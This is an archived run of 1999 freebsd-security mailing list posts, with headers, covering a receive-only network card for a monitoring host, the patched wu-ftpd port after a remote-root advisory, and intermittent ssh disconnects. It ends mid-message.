Delivered-To: freebsd-security@freebsd.org Received: from agora.neteze.com (agora.neteze.com [208.201.249.4]) by hub.freebsd.org (Postfix) with ESMTP id CA2BB14E1E for ; Thu, 9 Sep 1999 11:20:28 -0700 (PDT) (envelope-from kc@neteze.com) Received: from admin1 ([208.201.249.51]) by agora.neteze.com (Post.Office MTA v3.5.3 release 223 ID# 0-60395U6000L600S0V35) with SMTP id com for ; Thu, 9 Sep 1999 11:19:18 -0700 Message-ID: <021101befaef$9b220ba0$33f9c9d0@neteze.com> From: "Kelsey Cummings" To: References: <199909091758.KAA01232@passer.osg.gov.bc.ca> Subject: Re: Lisen only NIC Date: Thu, 9 Sep 1999 11:17:41 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-Mimeole: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Couldn't you accomplish the same thing with a NIC in promiscuous mode without an IP address? It would be a whole lot easier. Kelsey Cummings kc@microshaft.org ----- Original Message ----- From: Cy Schubert - ITSD Open Systems Group To: Reinier Bezuidenhout Cc: Darren Reed ; ; ; Sent: Thursday, September 09, 1999 10:58 AM Subject: Re: Lisen only NIC > In message <199909091446.QAA13441@oskar.nanoteq.co.za>, Reinier > Bezuidenhout wr > ites: > > > Err, this can do bad things like make your hub/switch think your station > > > has dropped off the network and hence get 0 packets. > > > > Yep ... this is true ... we've tried it before and failed :) > > > > The other thing todo is to try and remove the transmit code > > from the card driver :) > > why not, > > ipfw add 1 deny all ip from any to any out via xl0 > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca > ITSD Cy.Schubert@gems8.gov.bc.ca > Province of BC > "e**(i*pi)+1=0" > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 11:25:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id E177214FD0 for ; Thu, 9 Sep 1999 11:25:00 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (2625 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 9 Sep 1999 13:09:40 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7) Date: Thu, 9 Sep 1999 13:09:40 -0500 (CDT) From: James Wyatt To: "Lowkrantz, Goran" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The only *true* way I know of to get a listen-only NIC, is to physically disconnect the xmit line on the NIC. When I read about this in the "Repelling the wiley hacker" internet firewall/security book and tried it on an old 3Com 3c503, I thought it was sufficient and *really* secure. (The book is so good I've loaned it out so email for ISBN. Great book!) After reading the AntiSniff stuff by the L0pht folks, I'm not so sure. I could send an attack packet to your machine with a forged (or real) return address. When you look-up the hostname in DNS during capture or reporting, I could see (sniff DNS server ENet, hack DNS server, etc) the DNS query and know you saw my packet. I was also under the impression that you didn't have to ifconfig the card (causing ARP, reply packets, etc) to get /dev/bpf0 to work, since it worked at the MAC level. Try not configuring the card in rc.conf and just attaching to the filter for the card. - Jy@ On Thu, 9 Sep 1999, Lowkrantz, Goran wrote: > To check on our DMZs I am building a monitor system with a protected > interface connected to the internal network and a multiport card to monitor > the consoles of the systems in the DMZs. To check for attacks I have setup > Snort and have tested with the Vision IDS but I want to hide the network > interface completely so that it can't be seen or heard or attacked or > anything. I have looked in the handbook, security how-to and searched > mailing lists but not found anything about how to do this. > > The monitor system is on 3-stable, at the moment 3.3RC. > > What I would like to have: > A NIC listening on a connected network using one of the already used > addresses without being seen and without disturbing any traffic. > 1 - Is it possible to configure a NIC this way? > 2 - If not, I have tried to re-use an IP address from the DMZ, set IPFW to > allow all in and nothing out, but an arp from the DMZ still shows the IF. > How do I block this? > 3 - Am I off track? Is there a better way to do this? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 12: 9:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id D5BB7152BD for ; Thu, 9 Sep 1999 12:09:53 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA50497; Thu, 9 Sep 1999 13:09:43 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA30695; Thu, 9 Sep 1999 13:09:34 -0600 (MDT) Message-Id: <199909091909.NAA30695@harmony.village.org> To: Bill Fink Subject: Re: FTP Vulnerability Cc: "'freebsd-security@freebsd.org'" In-reply-to: Your message of "Thu, 09 Sep 1999 09:03:01 EDT." <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> References: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> Date: Thu, 09 Sep 1999 13:09:34 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- In message <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> Bill Fink writes: : I've visited the mirrors for the WUFTP site(s) looking for the versions : "after August 30" and there's NOTHING newer than MAY. I guess my wording wa sunclear. Use the FreeBSD port dated August 30 or newer. If you don't use the FreeBSD port, then follow the instructions at the wu-ftpd site on how to get an updated version. The port uses wu-ftpd 2.5.0 plus at least one patch from the wu-ftpd site to fix the security related problem. Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9gF7FUuHi5z0oilAQGgiQP+KGHVkeQeGPTpMOry9+GPVdUuHnSpai8N BOdcYrYacf8+mn23yd0/7xOWJFQLjwRmaqOn5Ir3UlYJNCT9qgutnT1aPYB52mz9 kDDI1sfgXto4JPZ3sVzlmXJwEvK8WK1iFZRCfVobyvNmQCJhnFkToXzhNnhxZVTX g7sbtTMqXrs= =AfRG -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 12:12:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 895B614C49 for ; Thu, 9 Sep 1999 12:12:38 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA50517; Thu, 9 Sep 1999 13:11:48 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA30736; Thu, 9 Sep 1999 13:11:39 -0600 (MDT) Message-Id: <199909091911.NAA30736@harmony.village.org> To: "Rashid N. Achilov" Subject: Re: FTP Vulnerability Cc: Ruslan Ermilov , Bill Fink , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 09 Sep 1999 20:54:08 +0700." References: Date: Thu, 09 Sep 1999 13:11:39 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- In message "Rashid N. Achilov" writes: : On Thu, 9 Sep 1999, Ruslan Ermilov wrote: : : > > I've visited the mirrors for the WUFTP site(s) looking for the versions : > > "after August 30" and there's NOTHING newer than MAY. : > > : > The versions we are talking about refer to the FreeBSD ports collection. : > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the : > following patch: : > : > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch : : On this site mapped.overrun... dated August,24. : In ports tree in patches subdir newest patch dated April,7 :-) The port updated its Makefile on or about August 30 to start using the mapped.path.overrun.patch file. Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9gGaVUuHi5z0oilAQFriwP/YpVRzMxETgfXlqO70EDhQQ1lQz0aOIR5 JphalepZzWAWW5/8PD61K5URzt2YcRwH5HXXQrnEwE8pqOGfH2RndDIV9jKc90NY CXyEX9c2HYt2W207eei/agi/2fC/Q5kITP3k0CiPtw6YaNUWinpY5WNlWwM982Ep VROBnv7mXoE= =xto7 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 12:19: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 2043B14FC5 for ; Thu, 9 Sep 1999 12:19:03 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA50548; Thu, 9 Sep 1999 13:18:01 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA30788; Thu, 9 Sep 1999 13:17:52 -0600 (MDT) Message-Id: <199909091917.NAA30788@harmony.village.org> To: Ruslan Ermilov Subject: Re: FTP Vulnerability Cc: "Rashid N. Achilov" , Bill Fink , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 09 Sep 1999 17:09:40 +0300." <19990909170940.B51179@relay.ucb.crimea.ua> References: <19990909170940.B51179@relay.ucb.crimea.ua> <19990909162255.A15548@relay.ucb.crimea.ua> Date: Thu, 09 Sep 1999 13:17:52 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- In message <19990909170940.B51179@relay.ucb.crimea.ua> Ruslan Ermilov writes: : Grr... Advisory refers to version of the FreeBSD port after 1999/08/30: Let me also explicitly state that the security officer's policy is to only support the FreeBSD ports tree for "re-issue" advisories. This is a recent change and I'm trying to figure out the exact parameters of the change, so feedback would be helpful. At the moment, if you aren't using ports for things like wu-ftpd, then you are on your own for doing research to see what you need to do to your, potentially random, system to make sure that it is not vulnerable. I reread the advisory and will be the first to admit that it wasn't the clearest advisory that I'd written in this area. In the future I'll try to make sure that I state this explicitly and clearly. Something like The wu-ftpd FreeBSD port in /usr/ports/ftp/wu-ftpd has been ungraded on August 30, 1999 to incorporate changes recommended by the wu-ftpd development team to eliminate a potential vulnerability that would allow remote users to gain root. You are strongly urged to upgrade /usr/ports/ftp/wu-ftpd to a version newer than that date, rebuild and reinstall wu-ftpd to eliminate this weakness on your system. Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9gH31UuHi5z0oilAQF12QP+NpoWbo83qlcfxFUsNJhrrz5iv2Gtl/Xv 485APBYuJOm8o6w4t9MxV16DP04m0DKZHCa9E0SwZHKsnsEqVmOrN1yEmjwRRqpw 6VKVXMt6EpSa4JNi5jK/zwsFn1Bq4TAnc7c4VqkLHb14XUbFQRDIMpQhxeo17UC2 jgD0gHMMs6I= =vFR9 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 12:23: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 53D3A15341 for ; Thu, 9 Sep 1999 12:22:55 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA50579; Thu, 9 Sep 1999 13:22:52 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA30860; Thu, 9 Sep 1999 13:22:43 -0600 (MDT) Message-Id: <199909091922.NAA30860@harmony.village.org> To: James Wyatt Subject: Re: Lisen only NIC Cc: "Lowkrantz, Goran" , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 09 Sep 1999 13:09:40 CDT." References: Date: Thu, 09 Sep 1999 13:22:43 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message James Wyatt writes: : The only *true* way I know of to get a listen-only NIC, is to physically : disconnect the xmit line on the NIC. When I read about this in the : "Repelling the wiley hacker" internet firewall/security book and tried it : on an old 3Com 3c503, I thought it was sufficient and *really* secure. : (The book is so good I've loaned it out so email for ISBN. Great book!) I've seen in other discussions that while you could do this with the AUI based ethernet cards, you can't do this with 10base2 or 10base-t cards. Thinnet is obvious... But the 10-base-t/100-base-t cards need the xmit lines to negotiate speed settings with the hub. Can anybody confirm this? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 12:32:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id C2C2E14C1D for ; Thu, 9 Sep 1999 12:32:51 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 13781 invoked by uid 1001); 9 Sep 1999 19:32:40 +0000 (GMT) To: imp@village.org Cc: jwyatt@rwsystems.net, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC From: sthaug@nethelp.no In-Reply-To: Your message of "Thu, 09 Sep 1999 13:22:43 -0600" References: <199909091922.NAA30860@harmony.village.org> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 09 Sep 1999 21:32:40 +0200 Message-ID: <13779.936905560@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I've seen in other discussions that while you could do this with the > AUI based ethernet cards, you can't do this with 10base2 or 10base-t > cards. Thinnet is obvious... But the 10-base-t/100-base-t cards need > the xmit lines to negotiate speed settings with the hub. Can anybody > confirm this? Not just for the negotiation, but also to keep the link up. There are link pulses sent at regular intervals. If these are not received, the link is detected as being down. It's possible to "cheat" on this with some active electronics. Anzen makes a "receive only" cable, see http://www.anzen.com/afj/afj_faq.html#anchor157338 Disclaimer: I have no particular knowledge of the Anzen product, aside from having seen a discussion about this on the NFR distribution list. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 12:44:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 45CA61521C for ; Thu, 9 Sep 1999 12:44:45 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id MAA18877; Thu, 9 Sep 1999 12:42:54 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199909091942.MAA18877@gndrsh.dnsmgr.net> Subject: Re: Lisen only NIC In-Reply-To: <199909091922.NAA30860@harmony.village.org> from Warner Losh at "Sep 9, 1999 01:22:43 pm" To: imp@village.org (Warner Losh) Date: Thu, 9 Sep 1999 12:42:53 -0700 (PDT) Cc: jwyatt@rwsystems.net (James Wyatt), Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In message James Wyatt writes: > : The only *true* way I know of to get a listen-only NIC, is to physically > : disconnect the xmit line on the NIC. When I read about this in the > : "Repelling the wiley hacker" internet firewall/security book and tried it > : on an old 3Com 3c503, I thought it was sufficient and *really* secure. > : (The book is so good I've loaned it out so email for ISBN. Great book!) > > I've seen in other discussions that while you could do this with the > AUI based ethernet cards, you can't do this with 10base2 or 10base-t > cards. Thinnet is obvious... Actually 10base2 and 10baseT cards are usually very easy to do, they still have an AUI interface between the NIC chip and the MAU chip. You just need to find it on the board and ``clip'' the traces. > But the 10-base-t/100-base-t cards need > the xmit lines to negotiate speed settings with the hub. Can anybody > confirm this? Dual mode cards, and actually 100BaseT changed the game somewhat. But thankfully MII came along. MII is a fancier AUI, I don't have a data book with it in here, but you should be able to achive the same effect by cutting the Xmit pair between the NIC and MII chip. It may fail auto-negotiation, but given that the MII chip is suppose to handle all that it may just work fine. Anyone have the datasheet on the SEEQ NQ80220/G MII chip so I can do some surgery and test things out?? Oohhhhh... and is anyone seeing this from very recent Kingston KNE100TX cards: de0: rev 0x41 int a irq 10 on pci0.14.0 de0: 21143 [10-100Mb/s] pass 4.1 (invalid EESPROM checksum) de0: address 00:c0:f0:4a:07:54 de0: enabling 100baseTX port The cards work fine... but our customers are asking what is up with this and I wanted to ask if anyone else is seeing it on any DEC based cards. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 12:57: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id D6BD215642 for ; Thu, 9 Sep 1999 12:57:05 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id MAA18901; Thu, 9 Sep 1999 12:53:26 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199909091953.MAA18901@gndrsh.dnsmgr.net> Subject: Re: Lisen only NIC In-Reply-To: <13779.936905560@verdi.nethelp.no> from "sthaug@nethelp.no" at "Sep 9, 1999 09:32:40 pm" To: sthaug@nethelp.no Date: Thu, 9 Sep 1999 12:53:26 -0700 (PDT) Cc: imp@village.org, jwyatt@rwsystems.net, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > I've seen in other discussions that while you could do this with the > > AUI based ethernet cards, you can't do this with 10base2 or 10base-t > > cards. Thinnet is obvious... But the 10-base-t/100-base-t cards need > > the xmit lines to negotiate speed settings with the hub. Can anybody > > confirm this? > > Not just for the negotiation, but also to keep the link up. There are > link pulses sent at regular intervals. If these are not received, the > link is detected as being down. Can you confirm for me that the link pulses are actually a function of the MAU/MII and not the NIC chip. I don't recall seeing anything in any NIC chip data sheet that talks about these. I don't have any current MAU/MII data sheets. > > It's possible to "cheat" on this with some active electronics. Anzen > makes a "receive only" cable, see > > http://www.anzen.com/afj/afj_faq.html#anchor157338 Back to back MAU's with the XMIT pair left out perhaps??? -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 15:53:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from atdot.dotat.org (atdot.dotat.org [150.101.89.3]) by hub.freebsd.org (Postfix) with ESMTP id 7FDA31573F for ; Thu, 9 Sep 1999 15:53:38 -0700 (PDT) (envelope-from newton@atdot.dotat.org) Received: (from newton@localhost) by atdot.dotat.org (8.9.3/8.7) id IAA74937; Fri, 10 Sep 1999 08:21:21 +0930 (CST) From: Mark Newton Message-Id: <199909092251.IAA74937@atdot.dotat.org> Subject: Re: Lisen only NIC To: jwyatt@rwsystems.net (James Wyatt) Date: Fri, 10 Sep 1999 08:21:21 +0930 (CST) Cc: Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG In-Reply-To: from "James Wyatt" at Sep 9, 99 01:09:40 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt wrote: > After reading the AntiSniff stuff by the L0pht folks, I'm not so sure. I > could send an attack packet to your machine with a forged (or real) return > address. When you look-up the hostname in DNS during capture or reporting, > I could see (sniff DNS server ENet, hack DNS server, etc) the DNS query > and know you saw my packet. How are you going to do that when I can't transmit any packets? > I was also under the impression that you didn't have to ifconfig the card > (causing ARP, reply packets, etc) to get /dev/bpf0 to work, since it > worked at the MAC level. Try not configuring the card in rc.conf and just > attaching to the filter for the card. - Jy@ The problem is that some cards will still, under some circumstances, respond to some broadcast traffic. Is that non-specific enough for you? :-) - mark -------------------------------------------------------------------- I tried an internal modem, newton@atdot.dotat.org but it hurt when I walked. Mark Newton ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 16:16:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from kinetic.tiora.net (kinetic.tiora.net [206.251.130.15]) by hub.freebsd.org (Postfix) with ESMTP id 6CF2014F0C for ; Thu, 9 Sep 1999 16:16:32 -0700 (PDT) (envelope-from liam@kinetic.tiora.net) Received: from localhost (liam@localhost) by kinetic.tiora.net (8.9.3/8.9.3) with ESMTP id QAA17930; Thu, 9 Sep 1999 16:14:33 -0700 (PDT) Date: Thu, 9 Sep 1999 16:14:33 -0700 (PDT) From: Liam Slusser To: Warner Losh Cc: "Rashid N. Achilov" , Ruslan Ermilov , Bill Fink , security@FreeBSD.ORG, support@tiora.net Subject: Re: FTP Vulnerability In-Reply-To: <199909091911.NAA30736@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does anybody know if BeroFTPD version 1.1.14 is Vulnerable? I know i need to update to a newer version one of these days...is this one of these days? *grin* liam System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address Lowered turbo powered Honda Civic's are really cool. <---------- my quote On Thu, 9 Sep 1999, Warner Losh wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > In message "Rashid N. Achilov" writes: > : On Thu, 9 Sep 1999, Ruslan Ermilov wrote: > : > : > > I've visited the mirrors for the WUFTP site(s) looking for the versions > : > > "after August 30" and there's NOTHING newer than MAY. > : > > > : > The versions we are talking about refer to the FreeBSD ports collection. > : > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the > : > following patch: > : > > : > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch > : > : On this site mapped.overrun... dated August,24. > : In ports tree in patches subdir newest patch dated April,7 :-) > > The port updated its Makefile on or about August 30 to start using the > mapped.path.overrun.patch file. > > Warner > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3ia > Charset: noconv > Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface > > iQCVAwUBN9gGaVUuHi5z0oilAQFriwP/YpVRzMxETgfXlqO70EDhQQ1lQz0aOIR5 > JphalepZzWAWW5/8PD61K5URzt2YcRwH5HXXQrnEwE8pqOGfH2RndDIV9jKc90NY > CXyEX9c2HYt2W207eei/agi/2fC/Q5kITP3k0CiPtw6YaNUWinpY5WNlWwM982Ep > VROBnv7mXoE= > =xto7 > -----END PGP SIGNATURE----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 17:20: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (4.npt-sdsl.stargate.net [208.223.229.4]) by hub.freebsd.org (Postfix) with ESMTP id A2B6C14F09 for ; Thu, 9 Sep 1999 17:19:57 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us) Received: from w2xo.pgh.pa.us (shazam.internal [192.168.5.3]) by w2xo.pgh.pa.us (8.9.2/8.9.1) with ESMTP id AAA30825; Fri, 10 Sep 1999 00:19:36 GMT (envelope-from durham@w2xo.pgh.pa.us) Message-ID: <37D84EE0.17A731E2@w2xo.pgh.pa.us> Date: Thu, 09 Sep 1999 20:20:48 -0400 From: "James C. Durham" Organization: dis- X-Mailer: Mozilla 4.61 [en] (X11; U; FreeBSD 3.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Nick Hibma Cc: freebsd-security@FreeBSD.ORG Subject: Re: ssh disconnects References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nick Hibma wrote: > > Best guess: A firewall is expiring your connection. If you have the > problem that ftp connection go slower and slo-wer and slo-w-e-r after > the first MegaByte, you probably use the same product as our friends > around here. > > Nick The connection does not seem to exhibit any "slow down". It just randomly disconnects. Thanks, -- Jim Durham To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 17:22:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (4.npt-sdsl.stargate.net [208.223.229.4]) by hub.freebsd.org (Postfix) with ESMTP id 2707814F09 for ; Thu, 9 Sep 1999 17:22:48 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us) Received: from w2xo.pgh.pa.us (shazam.internal [192.168.5.3]) by w2xo.pgh.pa.us (8.9.2/8.9.1) with ESMTP id AAA30841; Fri, 10 Sep 1999 00:22:34 GMT (envelope-from durham@w2xo.pgh.pa.us) Message-ID: <37D84F92.5D1745C5@w2xo.pgh.pa.us> Date: Thu, 09 Sep 1999 20:23:46 -0400 From: "James C. Durham" Organization: dis- X-Mailer: Mozilla 4.61 [en] (X11; U; FreeBSD 3.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Josef Karthauser Cc: freebsd-security@FreeBSD.ORG Subject: Re: ssh disconnects References: <199909090021.AAA27391@w2xo.pgh.pa.us> <19990909083505.F58237@florence.pavilion.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Josef Karthauser wrote: > > On Thu, Sep 09, 1999 at 12:21:04AM +0000, James C. Durham wrote: > > I have ssh forwarding ports from a machine on the internet to > > another machine with a private IP here at my house. > > > > Everything works fine, except that the connection drops at irregular > > I have the same problem, more or less. It occurs when my winbox > goes into sleep mode - during that time all TCP connections get > severed at some point, including interactive session - well annoying! I'm running FreeBSD on both ends. It does not seem to effect other connections such as telnet. Thsnk you for info. -- Jim Durham To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 17:30:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id E4D7315249 for ; Thu, 9 Sep 1999 17:30:14 -0700 (PDT) (envelope-from freebsd@deepwell.com) Received: (qmail 26286 invoked from network); 10 Sep 1999 01:14:23 -0000 Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 10 Sep 1999 01:14:23 -0000 Message-Id: <4.2.0.58.19990909172429.01ff7340@mail1.dcomm.net> X-Sender: freebsd@mail.deepwell.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Thu, 09 Sep 1999 17:27:53 -0700 To: nick.hibma@jrc.it, freebsd-security@freebsd.org From: Deepwell Internet Subject: Re: ssh disconnects In-Reply-To: <37D84EE0.17A731E2@w2xo.pgh.pa.us> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We have a situation where a customer gets these FTP slowdowns. He 